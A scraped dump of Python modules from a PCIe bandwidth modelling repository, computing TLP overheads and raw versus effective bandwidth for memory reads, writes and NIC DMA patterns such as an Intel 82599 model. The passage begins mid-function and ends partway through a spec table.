        req_raw_tx_bw = req_raw_tx_bw_b / float(10**9)
        req_raw_rx_bw = req_raw_rx_bw_b / float(10**9)
        # Effective bandwidth: scale raw bandwidth by payload/raw ratio.
        if direction & pcie.DIR_TX and direction & pcie.DIR_RX:
            eff_tx_bw = data_sz * req_raw_tx_bw / float(raw_tx_B)
            eff_rx_bw = data_sz * req_raw_rx_bw / float(raw_rx_B)
        elif direction & pcie.DIR_TX:
            eff_tx_bw = data_sz * req_raw_tx_bw / float(raw_tx_B)
            eff_rx_bw = 0.0
        elif direction & pcie.DIR_RX:
            eff_tx_bw = 0.0
            eff_rx_bw = data_sz * req_raw_rx_bw / float(raw_rx_B)
    else:  # BW_EFF
        # Effective bandwidth given: derive the raw bandwidth needed.
        if direction & pcie.DIR_TX and direction & pcie.DIR_RX:
            eff_tx_bw = bwspec.tx_bw
            eff_rx_bw = bwspec.rx_bw
            req_raw_tx_bw = eff_tx_bw * raw_tx_B / float(data_sz)
            req_raw_rx_bw = eff_rx_bw * raw_rx_B / float(data_sz)
        elif direction & pcie.DIR_TX:
            eff_tx_bw = bwspec.tx_bw
            eff_rx_bw = 0.0
            req_raw_tx_bw = eff_tx_bw * raw_tx_B / float(data_sz)
            # how many batches per second?
            num_batches = eff_tx_bw / float(data_sz)
            # work out rx bandwidth based on batches
            req_raw_rx_bw = num_batches * raw_rx_B
        elif direction & pcie.DIR_RX:
            eff_tx_bw = 0.0
            eff_rx_bw = bwspec.rx_bw
            num_batches = eff_rx_bw / float(data_sz)
            req_raw_tx_bw = num_batches * raw_tx_B
            req_raw_rx_bw = eff_rx_bw * raw_rx_B / float(data_sz)
    return pcie.BW_Res(req_raw_rx_bw, eff_rx_bw, req_raw_tx_bw, eff_tx_bw)
|
{"/model/util.py": ["/model/__init__.py"], "/model/mem_bw.py": ["/model/__init__.py"], "/model/niantic.py": ["/model/__init__.py"], "/nic_bw.py": ["/model/__init__.py"], "/model/simple_nic.py": ["/model/__init__.py"], "/pcie_bw.py": ["/model/__init__.py"]}
|
34,458
|
pcie-bench/pcie-model
|
refs/heads/master
|
/model/mem_bw.py
|
## Copyright (C) 2015-2018 Rolf Neugebauer. All rights reserved.
## Copyright (C) 2015 Netronome Systems, Inc. All rights reserved.
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
"""Simple PCIe memory bandwidth models"""
# pylint: disable=invalid-name
# pylint: disable=too-many-locals
# pylint: disable=unused-variable
import math
from . import pcie
def write(pcicfg, bwspec, size):
    """
    Calculate the bandwidth a simple continuous PCIe memory write of
    size 'size' will consume given the maximum payload size of 'mps'.
    The write requests are broken into up to mps sized chunks and the TLP
    header is added. There is no reverse direction traffic.
    @param pcicfg PCIe configuration
    @param bwspec Bandwidth specification
    @param size Size of payload in bytes
    """
    # One TLP per MPS-sized chunk; each TLP carries a MWr header.
    tlp_count = int(math.ceil(float(size) / float(pcicfg.mps)))
    wire_bytes = (tlp_count * pcicfg.TLP_MWr_Hdr_Sz) + size
    if bwspec.type == pcie.BW_Spec.BW_RAW:
        # Raw bandwidth given: derive effective by removing header overhead.
        raw_bw = bwspec.tx_bw
        eff_bw = float(size) * raw_bw / float(wire_bytes)
    else:
        # Effective bandwidth given: derive raw by adding header overhead.
        eff_bw = bwspec.tx_bw
        raw_bw = float(wire_bytes) * eff_bw / float(size)
    # Writes only consume TX bandwidth from the device's perspective.
    return pcie.BW_Res(0.0, 0.0, raw_bw, eff_bw)
def read(pcicfg, bwspec, size):
    """
    Calculate the bandwidth a simple continuous PCIe memory read of
    size 'size' will consume given the maximum payload size of 'mps'.
    PCIe memory reads require bandwidth in both directions: TX for sending
    requests and RX for receiving the data (PCIe Completions with Data).
    avail_??_bw is assumed to be of the same type for both RX and TX
    The read data is broken up into M PCIe completions with data
    transactions. Typically the first completion will align to Read
    Completion Boundary (RCB) and remaining completions will be
    multiples of RCB till the last completion.
    For simplicity we assume that read requests are aligned to
    boundaries. Depending on 'rcb_chunks' we break the completion in
    RCB sized chunks or MPS sized chunks. RCB sized chunks have been
    observed on several older chipsets.
    @param pcicfg PCIe configuration
    @param bwspec Bandwidth specification
    @param size Size of payload in bytes
    """
    dat_rx_B = size
    dat_tx_B = 0  # no data transmitted
    # Size of the read request. A request might have to be broken into
    # several requests according to MRRS.
    tx_num_tlps = int(math.ceil(float(dat_rx_B) / float(pcicfg.mrrs)))
    raw_tx_B = tx_num_tlps * pcicfg.TLP_MRd_Hdr_Sz
    # Size of the completion with data chopped up
    if pcicfg.rcb_chunks:
        rx_num_tlps = int(math.ceil(float(dat_rx_B) / float(pcicfg.rcb)))
    else:
        rx_num_tlps = int(math.ceil(float(dat_rx_B) / float(pcicfg.mps)))
    raw_rx_B = (rx_num_tlps * pcicfg.TLP_CplD_Hdr_Sz) + dat_rx_B
    if bwspec.type == pcie.BW_Spec.BW_RAW:
        # this calculation only makes sense if a raw bandwidth has been
        # specified. We work out if raw_tx_b fits in the available
        # bandwidth. If not, we need to adjust the number of rx blocks...
        raw_tx_b = raw_tx_B * 8
        raw_rx_b = raw_rx_B * 8
        avail_raw_tx_bw_b = bwspec.tx_bw * (10**9)
        avail_raw_rx_bw_b = bwspec.rx_bw * (10**9)
        # work out how many transactions the RX can cope with
        max_trans = avail_raw_rx_bw_b / float(raw_rx_b)
        # assume we can support the RX data rate with TX for requests
        req_raw_tx_bw_b = max_trans * raw_tx_b
        if req_raw_tx_bw_b > avail_raw_tx_bw_b:
            # can't send enough requests as we'd run out of TX bandwidth
            # Adjust the tx and rx work. Assume TX is maxed out
            req_raw_tx_bw_b = avail_raw_tx_bw_b
            # number of read requests we can support
            max_trans = req_raw_tx_bw_b / float(raw_tx_b)
            # work out new rx bandwidth
            req_raw_rx_bw_b = max_trans * raw_rx_b
        else:
            # we are maxed out on RX, so just use the tlp_bw
            req_raw_rx_bw_b = avail_raw_rx_bw_b
        req_raw_tx_bw = req_raw_tx_bw_b / float(10**9)
        req_raw_rx_bw = req_raw_rx_bw_b / float(10**9)
        eff_tx_bw = float(dat_tx_B) * req_raw_tx_bw / float(raw_tx_B)  # = 0
        eff_rx_bw = float(dat_rx_B) * req_raw_rx_bw / float(raw_rx_B)
    else:  # BW_EFF
        if not bwspec.tx_bw == 0:
            print("Effective TX BW for reads is always 0")
            bwspec.tx_bw = 0
        eff_tx_bw = bwspec.tx_bw
        eff_rx_bw = bwspec.rx_bw
        # BUG FIX: the original returned req_raw_rx_bw/req_raw_tx_bw
        # without defining them in this branch, raising NameError for
        # every BW_EFF spec. Derive them the same way util.gen_res does
        # for a DIR_RX-only transfer: scale the raw byte counts by the
        # number of transactions per second implied by the effective
        # RX bandwidth.
        num_trans = eff_rx_bw / float(dat_rx_B)
        req_raw_rx_bw = num_trans * raw_rx_B
        req_raw_tx_bw = num_trans * raw_tx_B
    return pcie.BW_Res(req_raw_rx_bw, eff_rx_bw, req_raw_tx_bw, eff_tx_bw)
def read_write(pcicfg, bwspec, size):
    """
    PCIe read and writes at the same time. read should impact write
    Assume symmetric read and writes,
    @param pcicfg PCIe configuration
    @param bwspec Bandwidth specification
    @param size Size of payload in bytes

    Returns a pcie.BW_Res with the combined raw and effective bandwidth
    for simultaneous same-size reads and writes.
    """
    data_bytes = size
    # Write bytes
    wr_rx_data_B = 0  # bytes for Writes received by the device
    wr_tx_data_B = 0  # bytes for Writes transmitted by the device
    # Writes are chopped into MPS-sized TLPs, each with a MWr header.
    wr_tx_num_tlps = int(math.ceil(float(data_bytes) / float(pcicfg.mps)))
    wr_rx_num_tlps = 0  # no TLPs our way for reads
    wr_tx_data_B = (wr_tx_num_tlps * pcicfg.TLP_MWr_Hdr_Sz) + data_bytes
    # Read bytes
    rd_rx_data_B = 0  # bytes for Reads received by the device
    rd_tx_data_B = 0  # bytes for Reads transmitted by the device
    # Size of the read request. A request might have to be broken into
    # several requests according to MRRS.
    rd_tx_num_tlps = int(math.ceil(float(data_bytes) / float(pcicfg.mrrs)))
    rd_tx_data_B = rd_tx_num_tlps * pcicfg.TLP_MRd_Hdr_Sz
    # Size of the completion with data chopped up (RCB- or MPS-sized).
    if pcicfg.rcb_chunks:
        rd_rx_num_tlps = int(math.ceil(float(data_bytes) / float(pcicfg.rcb)))
    else:
        rd_rx_num_tlps = int(math.ceil(float(data_bytes) / float(pcicfg.mps)))
    rd_rx_data_B = (rd_rx_num_tlps * pcicfg.TLP_CplD_Hdr_Sz) + data_bytes
    # we now have number of RAW bytes transferred in each direction for
    # both read and write requests
    # Work out overall bytes in each direction per transaction
    raw_rx_B = 0
    raw_tx_B = 0
    raw_rx_B += wr_rx_data_B
    raw_rx_B += rd_rx_data_B
    raw_tx_B += wr_tx_data_B
    raw_tx_B += rd_tx_data_B
    eff_data = data_bytes
    if bwspec.type == pcie.BW_Spec.BW_RAW:
        # We have been given available raw BW in each direction.
        # Reads requires BW in both direction. Writes only require BW in one
        # direction.
        raw_tx_b = raw_tx_B * 8
        raw_rx_b = raw_rx_B * 8
        # Available raw bandwidth converted to bit/s (bwspec values
        # appear to be in Gbit/s, given the 10**9 scaling).
        avail_raw_tx_bw_b = bwspec.tx_bw * (10**9)
        avail_raw_rx_bw_b = bwspec.rx_bw * (10**9)
        # work out how many Read transactions the RX avail BW can support
        max_rd_trans = avail_raw_rx_bw_b / float(raw_rx_b)
        # assume the TX BW can support Read requests and Write data
        req_raw_tx_bw_b = max_rd_trans * raw_tx_b
        if req_raw_tx_bw_b > avail_raw_tx_bw_b:
            # Ran out of TX BW
            # Adjust the tx and rx work. Assume TX is maxed out
            req_raw_tx_bw_b = avail_raw_tx_bw_b
            # number of read requests we can support
            max_rd_trans = req_raw_tx_bw_b / float(raw_tx_b)
            # work out new rx bandwidth
            req_raw_rx_bw_b = max_rd_trans * raw_rx_b
        else:
            # we are maxed out on RX, so just use all of the avail rx BW
            req_raw_rx_bw_b = avail_raw_rx_bw_b
        # Back to Gbit/s for the result object.
        req_raw_tx_bw = req_raw_tx_bw_b / float(10**9)
        req_raw_rx_bw = req_raw_rx_bw_b / float(10**9)
        eff_tx_bw = eff_data * req_raw_tx_bw / float(raw_tx_B)
        eff_rx_bw = eff_data * req_raw_rx_bw / float(raw_rx_B)
    else:  # BW_EFF
        # Effective bandwidth given: derive the raw bandwidth needed.
        eff_tx_bw = bwspec.tx_bw
        eff_rx_bw = bwspec.rx_bw
        req_raw_tx_bw = eff_tx_bw * raw_tx_B / float(eff_data)
        req_raw_rx_bw = eff_rx_bw * raw_rx_B / float(eff_data)
    return pcie.BW_Res(req_raw_rx_bw, eff_rx_bw, req_raw_tx_bw, eff_tx_bw)
|
{"/model/util.py": ["/model/__init__.py"], "/model/mem_bw.py": ["/model/__init__.py"], "/model/niantic.py": ["/model/__init__.py"], "/nic_bw.py": ["/model/__init__.py"], "/model/simple_nic.py": ["/model/__init__.py"], "/pcie_bw.py": ["/model/__init__.py"]}
|
34,459
|
pcie-bench/pcie-model
|
refs/heads/master
|
/model/niantic.py
|
## Copyright (C) 2015-2018 Rolf Neugebauer. All rights reserved.
## Copyright (C) 2015 Netronome Systems, Inc. All rights reserved.
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
"""A model for a Intel Niantic 10G NIC"""
# pylint: disable=invalid-name
# pylint: disable=bad-whitespace
# pylint: disable=too-many-arguments
# pylint: disable=too-many-locals
# pylint: disable=too-many-statements
import math
from . import pcie
from . import util
def bw(pcicfg, bwspec, direction, pkt_size, irq_mod=32, h_opt=None):
    """
    Estimate the PCIe bandwidth requirements for a device which looks
    very much like an Intel Niantic (82599) 10G NIC.

    @param pcicfg    PCIe configuration (pcie.Cfg)
    @param bwspec    Bandwidth specification (pcie.BW_Spec)
    @param direction pcie.DIR_RX, pcie.DIR_TX or pcie.DIR_BOTH
    @param pkt_size  Size of the Ethernet frame (subtract 4 to calculate
                     with FCS stripping)
    @param irq_mod   Controls interrupts. IRQ every n packets. 0 no IRQ
    @param h_opt     Host driver optimisations (see below)
    @returns A BW_Res object

    The details below are taken from the Intel 82599 10 GbE Controller
    Datasheet, specifically, the following sections:
    - 1.9.1 Transmit (Tx) Data Flow
    - 7.2.1.2 Transmit Path in the 82599
    - 7.2.3.4 Transmit Descriptor Fetching
    - 7.2.3.2.4 Advanced Transmit Data Descriptor
    - 1.9.2 Receive (Rx) Data Flow
    - 7.1.6 Advanced Receive Descriptors
    - 7.1.7 Receive Descriptor Fetching

    Throughout we assume the advanced descriptor format being used.
    We further assume that a single RX and TX ring is being used.

    TX from the host:
    1. Host updates the TX queue tail pointer (PCIe write: rx)
    2. Device DMAs descriptor(s) (PCIe read: rx/tx)
    3. Device DMAs packet content (PCIe read: rx/tx)
    4. Device writes back TX descriptor (PCIe write: tx)
    5. Device generates interrupt (PCIe write: tx)
    6. Host reads TX queue head pointer (PCIe read: rx/tx)

    Note: The device may fetch up to 40 TX descriptors at a time
    Note: The device may prefetch TX descriptors if its internal Q
          becomes close to empty. We don't model that.
    Note: TX descriptor write back (step 4) is optional and can be
          batched if TXDCTL[n].WTHRESH is set to non-0. Default on
          Linux seems to be 8.
    Note: There is an optional head pointer write back which disables
          TX descriptor write-back. This is enabled via
          TDWBAL[n].Head_WB_En and is disabled by default on Linux.
    Note: All descriptors are 128bit
    Note: The linux driver updates the TX tail pointer on every packet

    RX to the host:
    1. Host updates RX Queue Tail Pointer -> free buf (PCIe write: rx)
    2. Device DMAs descriptor from host (PCIe read: rx/tx)
    3. Device DMAs packet to host (PCIe write: tx)
    4. Device writes back RX descriptor (PCIe write: tx)
    5. Device generates interrupt (PCIe write: tx)
    6. Host reads RX queue head pointer (PCIe read: rx/tx)

    Note: By default the Ethernet FCS is stripped before transmitting
          to the host (HLREG0.RXCRCSTRP). We leave it up to the caller
          to determine if the FCS should be stripped.
    Note: Niantic does not pre-fetch freelist descriptors. They are
          fetched on demand, when needed.
    Note: Niantic does not seem to be doing any batching of RX
          descriptor write-back unless descriptors belong to the same
          packet (e.g. RSC).
    Note: All descriptors are 128bit

    The default configuration is based on the Linux kernel ixgbe
    driver and how it sets up and uses the NIC. The DPDK poll mode
    driver interacts with the device slightly differently.
    Specifically:
    - TX: Steps 5 and 6 are omitted. No interrupts are generated on
      transmit and the TX Descriptor Done is checked to free
      transmitted buffers. TX descriptors are enqueued in batches of 32
    - RX: Steps 5 and 6 are omitted. No interrupts are generated on
      receive and the RX Descriptor Done is checked to detect new
      packets.
    To enable these optimisations set @h_opt="PMD"
    """
    # Descriptor and pointer sizes in bytes (all descriptors are 128 bit)
    tx_desc_sz = 16
    tx_desc_wb_sz = 16
    rx_desc_sz = 16
    rx_desc_wb_sz = 16
    ptr_sz = 4

    # Niantic can prefetch up to 40 descriptors and write back batches of 8
    d_tx_batch = 40
    d_tx_batch_wb = 8

    # Assumptions about what the host is doing: Update the TX pointer
    # every @h_tx_batch packets. En-queue @h_fl_batch free buffers at
    # a time and update the RX head pointer every @h_rx_batch
    h_tx_batch = 1
    h_fl_batch = 32
    h_rx_batch = 8
    if h_opt == "PMD":
        h_tx_batch = 32
        irq_mod = 0

    # work out a common batch size and the per-task multipliers, i.e.
    # how often each per-batch event happens within @batch_mul packets
    batch_mul = util.low_com_mul(h_fl_batch, d_tx_batch)
    d_tx_batch_mul = batch_mul / d_tx_batch
    d_tx_batch_wb_mul = batch_mul / d_tx_batch_wb
    h_tx_batch_mul = batch_mul / h_tx_batch
    h_fl_batch_mul = batch_mul / h_fl_batch
    h_rx_batch_mul = batch_mul / h_rx_batch
    if irq_mod > 0:
        irq_mul = batch_mul / irq_mod
    else:
        irq_mul = 0

    # stash the packet size away
    data_B = pkt_size

    if not direction & pcie.DIR_BOTH:
        raise Exception("Unknown Direction %d" % direction)

    # XXX add a check that the batch reads/writes of descriptors do not
    # exceed MPS, MRRS, RCB. It is not handled in this code...

    # Packet TX
    tx_rx_data_B = 0  # bytes for TX received by the device
    tx_tx_data_B = 0  # bytes for TX transmitted by the device
    # H: tail pointer write (once per h_tx_batch)
    tx_rx_data_B += (ptr_sz + pcicfg.TLP_MWr_Hdr_Sz) * h_tx_batch_mul
    # D: read descriptor (once per d_tx_batch)
    _rd_sz = tx_desc_sz * d_tx_batch
    tlps = int(math.ceil(float(_rd_sz) / float(pcicfg.mrrs)))
    tx_tx_data_B += (tlps * pcicfg.TLP_MRd_Hdr_Sz) * d_tx_batch_mul
    if pcicfg.rcb_chunks:
        tlps = int(math.ceil(float(_rd_sz) / float(pcicfg.rcb)))
    else:
        tlps = int(math.ceil(float(_rd_sz) / float(pcicfg.mps)))
    tx_rx_data_B += ((tlps * pcicfg.TLP_CplD_Hdr_Sz) + _rd_sz) * d_tx_batch_mul
    # D: data DMA reads (For each packet)
    tlps = int(math.ceil(float(data_B) / float(pcicfg.mrrs)))
    tx_tx_data_B += (tlps * pcicfg.TLP_MRd_Hdr_Sz) * batch_mul
    if pcicfg.rcb_chunks:
        tlps = int(math.ceil(float(data_B) / float(pcicfg.rcb)))
    else:
        tlps = int(math.ceil(float(data_B) / float(pcicfg.mps)))
    tx_rx_data_B += ((tlps * pcicfg.TLP_CplD_Hdr_Sz) + data_B) * batch_mul
    # D: Write back descriptors (once per d_tx_batch_wb)
    _wr_sz = tx_desc_wb_sz * d_tx_batch_wb
    tlps = int(math.ceil(float(_wr_sz) / float(pcicfg.mps)))
    tx_tx_data_B += ((tlps * pcicfg.TLP_MWr_Hdr_Sz) + _wr_sz) * d_tx_batch_wb_mul
    if not h_opt == "PMD":
        # D: send IRQ (depending on setting)
        tx_tx_data_B += (pcie.MSI_SIZE + pcicfg.TLP_MWr_Hdr_Sz) * irq_mul
        # H: read head pointer (once per h_tx_batch)
        tx_rx_data_B += pcicfg.TLP_MRd_Hdr_Sz * h_tx_batch_mul
        tx_tx_data_B += (ptr_sz + pcicfg.TLP_CplD_Hdr_Sz) * h_tx_batch_mul
    # done

    # Packet RX
    rx_rx_data_B = 0  # bytes for RX received by the device
    rx_tx_data_B = 0  # bytes for RX transmitted by the device
    # H: tail pointer write (once per h_fl_batch)
    rx_rx_data_B += (ptr_sz + pcicfg.TLP_MWr_Hdr_Sz) * h_fl_batch_mul
    # D: read descriptors (For each packet)
    rx_tx_data_B += pcicfg.TLP_MRd_Hdr_Sz * batch_mul
    rx_rx_data_B += (rx_desc_sz + pcicfg.TLP_CplD_Hdr_Sz) * batch_mul
    # D: DMA write (For each packet)
    tlps = int(math.ceil(float(data_B) / float(pcicfg.mps)))
    # BUG FIX: this previously used '=' which discarded the descriptor
    # read bytes accumulated above; accumulate with '+=' instead.
    rx_tx_data_B += ((tlps * pcicfg.TLP_MWr_Hdr_Sz) + data_B) * batch_mul
    # D: Write back descriptors (For each packet)
    rx_tx_data_B += (rx_desc_wb_sz + pcicfg.TLP_MWr_Hdr_Sz) * batch_mul
    if not h_opt == "PMD":
        # D: send IRQ (Depending on setting)
        rx_tx_data_B += (pcie.MSI_SIZE + pcicfg.TLP_MWr_Hdr_Sz) * irq_mul
        # H: read head pointer (once per h_rx_batch)
        rx_rx_data_B += pcicfg.TLP_MRd_Hdr_Sz * h_rx_batch_mul
        rx_tx_data_B += (ptr_sz + pcicfg.TLP_CplD_Hdr_Sz) * h_rx_batch_mul
    # done

    # we now know how many bytes are transfered in each direction for
    # both RX and TX for a batch. Lets work out how much we can transfer etc.
    return util.gen_res(bwspec, direction, data_B * batch_mul,
                        tx_rx_data_B, tx_tx_data_B, rx_rx_data_B, rx_tx_data_B)
|
{"/model/util.py": ["/model/__init__.py"], "/model/mem_bw.py": ["/model/__init__.py"], "/model/niantic.py": ["/model/__init__.py"], "/nic_bw.py": ["/model/__init__.py"], "/model/simple_nic.py": ["/model/__init__.py"], "/pcie_bw.py": ["/model/__init__.py"]}
|
34,460
|
pcie-bench/pcie-model
|
refs/heads/master
|
/nic_bw.py
|
#! /usr/bin/env python3
#
## Copyright (C) 2015-2018 Rolf Neugebauer. All rights reserved.
## Copyright (C) 2015 Netronome Systems, Inc. All rights reserved.
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
"""A script to generate performance estimates for NICs"""
import sys
from model import pcie, eth, mem_bw, simple_nic, niantic
# pylint: disable=bad-whitespace
# pylint: disable=too-many-locals
def main():
    """Write per-packet-size NIC bandwidth estimates to nic_bw.dat.

    Columns: raw PCIe write/read-write limits, 40G Ethernet line rate,
    and effective bandwidth for the simplistic NIC model, the kernel
    driven Niantic model and the DPDK (PMD) driven Niantic model, each
    bi-directional, TX-only and RX-only.
    """
    cfg = pcie.Cfg(version='gen3',
                   lanes='x8',
                   addr=64,
                   ecrc=0,
                   mps=256,
                   mrrs=512,
                   rcb=64)
    ethcfg = eth.Cfg('40GigE')
    tlp_bw = cfg.TLP_bw
    bw_spec = pcie.BW_Spec(tlp_bw, tlp_bw, pcie.BW_Spec.BW_RAW)
    # use a context manager so the file is closed even on error
    with open("nic_bw.dat", "w") as dat:
        dat.write("\"Packet Size(Bytes)\" "
                  "\"Max. Write Bandwidth\" "
                  "\"Max. R/W Bandwidth\" "
                  "\"40Gb/s Line Rate (- FCS)\" "
                  "\"Simplistic NIC Bi-directional\" "
                  "\"Simplistic NIC TX only\" "
                  "\"Simplistic NIC RX only\" "
                  "\"kernel NIC Bi-directional\" "
                  "\"kernel NIC TX only\" "
                  "\"kernel NIC RX only\" "
                  "\"DPDK NIC Bi-directional\" "
                  "\"DPDK NIC TX only\" "
                  "\"DPDK NIC RX only\" "
                  "\n")
        # "size - 4" throughout: model FCS stripping (FCS not DMAed)
        for size in range(64, 1500):
            w_bw = mem_bw.write(cfg, bw_spec, size - 4)
            rw_bw = mem_bw.read(cfg, bw_spec, size - 4)
            # Work out Ethernet bandwidth. Typically do not transfer the FCS
            eth_bw = ethcfg.bps_ex(size - 4) / (1000 * 1000 * 1000.0)
            # Remember NIC RX is DIR_TX
            simple_nic_bi = simple_nic.bw(cfg, bw_spec, pcie.DIR_BOTH, size - 4)
            simple_nic_tx = simple_nic.bw(cfg, bw_spec, pcie.DIR_RX, size - 4)
            simple_nic_rx = simple_nic.bw(cfg, bw_spec, pcie.DIR_TX, size - 4)
            kernel_nic_bi = niantic.bw(cfg, bw_spec, pcie.DIR_BOTH, size - 4)
            kernel_nic_tx = niantic.bw(cfg, bw_spec, pcie.DIR_RX, size - 4)
            kernel_nic_rx = niantic.bw(cfg, bw_spec, pcie.DIR_TX, size - 4)
            pmd_nic_bi = niantic.bw(cfg, bw_spec, pcie.DIR_BOTH, size - 4, h_opt="PMD")
            pmd_nic_tx = niantic.bw(cfg, bw_spec, pcie.DIR_RX, size - 4, h_opt="PMD")
            pmd_nic_rx = niantic.bw(cfg, bw_spec, pcie.DIR_TX, size - 4, h_opt="PMD")
            # NOTE: the original also tracked a running max of all values in
            # a local "max_val" which was never used; dead code removed.
            dat.write("%d %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f\n" %
                      (size, w_bw.tx_eff, rw_bw.rx_eff,
                       eth_bw,
                       simple_nic_bi.tx_eff, simple_nic_tx.rx_eff, simple_nic_rx.tx_eff,
                       kernel_nic_bi.tx_eff, kernel_nic_tx.rx_eff, kernel_nic_rx.tx_eff,
                       pmd_nic_bi.tx_eff, pmd_nic_tx.rx_eff, pmd_nic_rx.tx_eff
                      ))
# Script entry point: exit status is main()'s return value (None -> 0).
if __name__ == '__main__':
    sys.exit(main())
|
{"/model/util.py": ["/model/__init__.py"], "/model/mem_bw.py": ["/model/__init__.py"], "/model/niantic.py": ["/model/__init__.py"], "/nic_bw.py": ["/model/__init__.py"], "/model/simple_nic.py": ["/model/__init__.py"], "/pcie_bw.py": ["/model/__init__.py"]}
|
34,461
|
pcie-bench/pcie-model
|
refs/heads/master
|
/model/pcie.py
|
## Copyright (C) 2018 Rolf Neugebauer. All rights reserved.
## Copyright (C) 2015 Netronome Systems, Inc. All rights reserved.
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
"""General definitions for PCIe bandwidth calculations"""
# pylint: disable=invalid-name
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-arguments
# pylint: disable=too-few-public-methods
##
## General PCIe variables from the Spec
##
Vers = ['gen1', 'gen2', 'gen3', 'gen4', 'gen5']
Laness = ['x1', 'x2', 'x4', 'x8', 'x16', 'x32']
Laness_mul = [1, 2, 4, 8, 16, 32]
# Transactions per second
GTs = {'gen1' : 2.5,
'gen2' : 5.0,
'gen3' : 8.0,
'gen4' : 16.0,
'gen5' : 32.0}
# Either 8b/10b or 128b/130b symbol encoding
Gbs = {}
for ver in GTs.keys():
if GTs[ver] >= 8.0:
Gbs[ver] = (128.0/130.0) * GTs[ver]
else:
Gbs[ver] = (8.0/10.0) * GTs[ver]
# Raw bandwidth Gbs * Lanes
Raw = {}
for ver in Vers:
for lanes in Laness:
if not ver in Raw:
Raw[ver] = {}
Raw[ver][lanes] = Gbs[ver] * \
Laness_mul[Laness.index(lanes)]
# Maximum Payload Size
MPSs = [128, 256, 512, 1024, 2048, 4096]
# Maximum Read Request Sizes
MRRSs = [128, 256, 512, 1024, 2048, 4096]
# Read Completion Boundaries
RCBs = [64, 128, 256, 512]
# FC Update Rate,
# see PCIe Base Spec rev 5.0 Table 2-46, 2-47, and 2-48
# On-wire size of a flow-control update DLLP
FC_Size = 8  # 2 B Phys + 4 B DLLP + 2B DLLP CRC
# Recommended symbol-time interval between FC updates,
# indexed [version][lanes][mps]
FC_Guide = {
    'gen1' : {
        'x1' : {128: 237, 256: 416, 512: 559, 1024: 1071, 2048: 2095, 4096: 4143},
        'x2' : {128: 128, 256: 217, 512: 289, 1024: 545, 2048: 1057, 4096: 2081},
        'x4' : {128: 73, 256: 118, 512: 154, 1024: 282, 2048: 538, 4096: 1050},
        'x8' : {128: 67, 256: 107, 512: 86, 1024: 150, 2048: 278, 4096: 534},
        'x16' : {128: 48, 256: 72, 512: 86, 1024: 150, 2048: 278, 4096: 534},
        # NOTE(review): gen1/x32/2048 is 248 here but 148 in Ack_Limits
        # below — one of the two looks like a transcription slip; verify
        # against the spec tables before relying on it.
        'x32' : {128: 33, 256: 45, 512: 52, 1024: 84, 2048: 248, 4096: 276},
    },
    'gen2' : {
        'x1' : {128: 288, 256: 467, 512: 610, 1024: 1122, 2048: 2146, 4096: 4194},
        'x2' : {128: 179, 256: 268, 512: 340, 1024: 596, 2048: 1108, 4096: 2132},
        'x4' : {128: 124, 256: 169, 512: 205, 1024: 333, 2048: 589, 4096: 1101},
        'x8' : {128: 118, 256: 158, 512: 137, 1024: 201, 2048: 329, 4096: 585},
        'x16' : {128: 99, 256: 123, 512: 137, 1024: 201, 2048: 329, 4096: 585},
        # NOTE(review): gen2/x32/4096 is 327 here but 237 in Ack_Limits
        # below — verify against the spec tables.
        'x32' : {128: 84, 256: 96, 512: 103, 1024: 135, 2048: 199, 4096: 327},
    },
    # gen3/gen4/gen5 entries are identical below
    'gen3' : {
        'x1' : {128: 333, 256: 512, 512: 655, 1024: 1167, 2048: 2191, 4096: 4239},
        'x2' : {128: 224, 256: 313, 512: 385, 1024: 641, 2048: 1153, 4096: 2177},
        'x4' : {128: 169, 256: 214, 512: 250, 1024: 378, 2048: 634, 4096: 1146},
        'x8' : {128: 163, 256: 203, 512: 182, 1024: 246, 2048: 374, 4096: 630},
        'x16' : {128: 144, 256: 168, 512: 182, 1024: 246, 2048: 374, 4096: 630},
        'x32' : {128: 129, 256: 141, 512: 148, 1024: 180, 2048: 244, 4096: 372},
    },
    'gen4' : {
        'x1' : {128: 333, 256: 512, 512: 655, 1024: 1167, 2048: 2191, 4096: 4239},
        'x2' : {128: 224, 256: 313, 512: 385, 1024: 641, 2048: 1153, 4096: 2177},
        'x4' : {128: 169, 256: 214, 512: 250, 1024: 378, 2048: 634, 4096: 1146},
        'x8' : {128: 163, 256: 203, 512: 182, 1024: 246, 2048: 374, 4096: 630},
        'x16' : {128: 144, 256: 168, 512: 182, 1024: 246, 2048: 374, 4096: 630},
        'x32' : {128: 129, 256: 141, 512: 148, 1024: 180, 2048: 244, 4096: 372},
    },
    'gen5' : {
        'x1' : {128: 333, 256: 512, 512: 655, 1024: 1167, 2048: 2191, 4096: 4239},
        'x2' : {128: 224, 256: 313, 512: 385, 1024: 641, 2048: 1153, 4096: 2177},
        'x4' : {128: 169, 256: 214, 512: 250, 1024: 378, 2048: 634, 4096: 1146},
        'x8' : {128: 163, 256: 203, 512: 182, 1024: 246, 2048: 374, 4096: 630},
